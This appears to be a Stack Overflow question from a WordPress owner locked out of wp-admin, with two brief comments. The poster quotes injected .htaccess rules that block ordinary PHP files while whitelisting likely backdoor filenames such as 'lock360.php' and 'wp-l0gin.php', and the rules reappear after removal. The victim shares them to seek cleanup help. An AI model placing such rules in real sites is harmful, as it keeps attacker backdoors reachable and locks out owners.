# Weird code in .htaccess and cannot log in to wp-admin just keeps on redirecting

Tags: .htaccess, redirect, malware, wp-admin

I can't sign in to the WordPress admin dashboard it just keeps redirecting back to the login page. I notice the .htaccess has a weird code in it,

```
<FilesMatch ".(py|exe|php)$">
Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
```

I tried replacing the code with the default one but it just keep coming back. Also, I noticed that the wp-config.php was set to 0444 permission. I think it has something to do with malware.

How can I fix this issue? Appreciate your help!.

Thank you!

Comment: There seems to have been several very similar questions recently, such as... https://stackoverflow.com/questions/70165874/how-to-remove-malware-code-from-in-index-php-and-htaccess-file-in-wordpress-webs

Comment: Did you manage to get it fixed?